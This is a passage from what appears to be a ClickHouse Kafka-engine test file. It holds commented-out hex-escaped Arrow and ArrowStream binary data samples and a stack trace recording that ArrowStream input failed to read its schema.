x00\x00\x00\x0c\x00\x14\x00\x06\x00\x08\x00\x0c\x00\x10\x00\x0c\x00\x00\x00\x00\x00\x03\x00\x3c\x00\x00\x00\x28\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x58\x01\x00\x00\x00\x00\x00\x00\x60\x01\x00\x00\x00\x00\x00\x00\x48\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\x78\x01\x00\x00\x41\x52\x52\x4f\x57\x31',
# '\x41\x52\x52\x4f\x57\x31\x00\x00\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x10\x00\x00\x00\x0c\x00\x14\x00\x06\x00\x08\x00\x0c\x00\x10\x00\x0c\x00\x00\x00\x00\x00\x03\x00\x3c\x00\x00\x00\x28\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x58\x01\x00\x00\x00\x00\x00\x00\x60\x01\x00\x00\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\x78\x01\x00\x00\x41\x52\x52\x4f\x57\x31',
# ],
# },
# 'ArrowStream' : {
# # Not working at all:
# # Error while opening a table: Invalid: Tried reading schema message, was null or length 0, Stack trace (when copying this message, always include the lines below):
# # /src/Processors/Formats/Impl/ArrowBlockInputFormat.cpp:88: DB::ArrowBlockInputFormat::prepareReader() @ 0x1ddff1c3 in /usr/bin/clickhouse
# # /src/Processors/Formats/Impl/ArrowBlockInputFormat.cpp:26: DB::ArrowBlockInputFormat::ArrowBlockInputFormat(DB::ReadBuffer&, DB::Block const&, bool) @ 0x1ddfef63 in /usr/bin/clickhouse
# # /contrib/libcxx/include/memory:2214: std::__1::__compressed_pair_elem<DB::ArrowBlockInputFormat, 1, false>::__compressed_pair_elem<DB::ReadBuffer&, DB::Block const&, bool&&, 0ul, 1ul, 2ul>(std::__1::piecewise_construct_t, std::__1::tuple<DB::ReadBuffer&, DB::Block const&, bool&&>, std::__1::__tuple_indices<0ul, 1ul, 2ul>) @ 0x1de0470f in /usr/bin/clickhouse
# # /contrib/libcxx/include/memory:2299: std::__1::__compressed_pair<std::__1::allocator<DB::ArrowBlockInputFormat>, DB::ArrowBlockInputFormat>::__compressed_pair<std::__1::allocator<DB::ArrowBlockInputFormat>&, DB::ReadBuffer&, DB::Block const&, bool&&>(std::__1::piecewise_construct_t, std::__1::tuple<std::__1::allocator<DB::ArrowBlockInputFormat>&>, std::__1::tuple<DB::ReadBuffer&, DB::Block const&, bool&&>) @ 0x1de04375 in /usr/bin/clickhouse
# # /contrib/libcxx/include/memory:3569: std::__1::__shared_ptr_emplace<DB::ArrowBlockInputFormat, std::__1::allocator<DB::ArrowBlockInputFormat> >::__shared_ptr_emplace<DB::ReadBuffer&, DB::Block const&, bool>(std::__1::allocator<DB::ArrowBlockInputFormat>, DB::ReadBuffer&, DB::Block const&, bool&&) @ 0x1de03f97 in /usr/bin/clickhouse
# # /contrib/libcxx/include/memory:4400: std::__1::enable_if<!(is_array<DB::ArrowBlockInputFormat>::value), std::__1::shared_ptr<DB::ArrowBlockInputFormat> >::type std::__1::make_shared<DB::ArrowBlockInputFormat, DB::ReadBuffer&, DB::Block const&, bool>(DB::ReadBuffer&, DB::Block const&, bool&&) @ 0x1de03d4c in /usr/bin/clickhouse
# # /src/Processors/Formats/Impl/ArrowBlockInputFormat.cpp:117: DB::registerInputFormatProcessorArrow(DB::FormatFactory&)::$_1::operator()(DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) const @ 0x1de0273f in /usr/bin/clickhouse
# # /contrib/libcxx/include/type_traits:3519: decltype(std::__1::forward<DB::registerInputFormatProcessorArrow(DB::FormatFactory&)::$_1&>(fp)(std::__1::forward<DB::ReadBuffer&>(fp0), std::__1::forward<DB::Block const&>(fp0), std::__1::forward<DB::RowInputFormatParams const&>(fp0), std::__1::forward<DB::FormatSettings const&>(fp0))) std::__1::__invoke<DB::registerInputFormatProcessorArrow(DB::FormatFactory&)::$_1&, DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&>(DB::registerInputFormatProcessorArrow(DB::FormatFactory&)::$_1&, DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) @ 0x1de026da in /usr/bin/clickhouse
# # /contrib/libcxx/include/__functional_base:317: std::__1::shared_ptr<DB::IInputFormat> std::__1::__invoke_void_return_wrapper<std::__1::shared_ptr<DB::IInputFormat> >::__call<DB::registerInputFormatProcessorArrow(DB::FormatFactory&)::$_1&, DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&>(DB::registerInputFormatProcessorArrow(DB::FormatFactory&)::$_1&, DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) @ 0x1de025ed in /usr/bin/clickhouse
# # /contrib/libcxx/include/functional:1540: std::__1::__function::__alloc_func<DB::registerInputFormatProcessorArrow(DB::FormatFactory&)::$_1, std::__1::allocator<DB::registerInputFormatProcessorArrow(DB::FormatFactory&)::$_1>, std::__1::shared_ptr<DB::IInputFormat> (DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&)>::operator()(DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) @ 0x1de0254a in /usr/bin/clickhouse
# # /contrib/libcxx/include/functional:1714: std::__1::__function::__func<DB::registerInputFormatProcessorArrow(DB::FormatFactory&)::$_1, std::__1::allocator<DB::registerInputFormatProcessorArrow(DB::FormatFactory&)::$_1>, std::__1::shared_ptr<DB::IInputFormat> (DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&)>::operator()(DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) @ 0x1de0165c in /usr/bin/clickhouse
# # /contrib/libcxx/include/functional:1867: std::__1::__function::__value_func<std::__1::shared_ptr<DB::IInputFormat> (DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&)>::operator()(DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) const @ 0x1dd14dbd in /usr/bin/clickhouse
# # /contrib/libcxx/include/functional:2473: std::__1::function<std::__1::shared_ptr<DB::IInputFormat> (DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&)>::operator()(DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) const @ 0x1dd07035 in /usr/bin/clickhouse
# # /src/Formats/FormatFactory.cpp:258: DB::FormatFactory::getInputFormat(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > const&, DB::ReadBuffer&, DB::Block const&, DB::Context const&, unsigned long, std::__1::function<void ()>) const @ 0x1dd04007 in /usr/bin/clickhouse
# # /src/Storages/Kafka/KafkaBlockInputStream.cpp:76: DB::KafkaBlockInputStream::readImpl() @ 0x1d8f6559 in /usr/bin/clickhouse
# # /src/DataStreams/IBlockInputStream.cpp:60: DB::IBlockInputStream::read() @ 0x1c9c92fd in /usr/bin/clickhouse
# # /src/DataStreams/copyData.cpp:26: void DB::copyDataImpl<DB::copyData(DB::IBlockInputStream&, DB::IBlockOutputStream&, std::__1::atomic<bool>*)::$_0&, void (&)(DB::Block const&)>(DB::IBlockInputStream&, DB::IBlockOutputStream&, DB::copyData(DB::IBlockInputStream&, DB::IBlockOutputStream&, std::__1::atomic<bool>*)::$_0&, void (&)(DB::Block const&)) @ 0x1c9ea01c in /usr/bin/clickhouse
# 'data_sample' : [
# '\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00',
# '\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x48\x01\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x38\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x38\x01\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00\x06\x00\x00\x00\x08\x00\x00\x00\x0a\x00\x00\x00\x0c\x00\x00\x00\x0e\x00\x00\x00\x10\x00\x00\x00\x12\x00\x00\x00\x14\x00\x00\x00\x16\x00\x00\x00\x18\x00\x00\x00\x1a\x00\x00\x00\x1c\x00\x00\x00\x1e\x00\x00\x00\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x00\xff\xff\xff\xff\x00\x00\x00\x00',
# '\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x0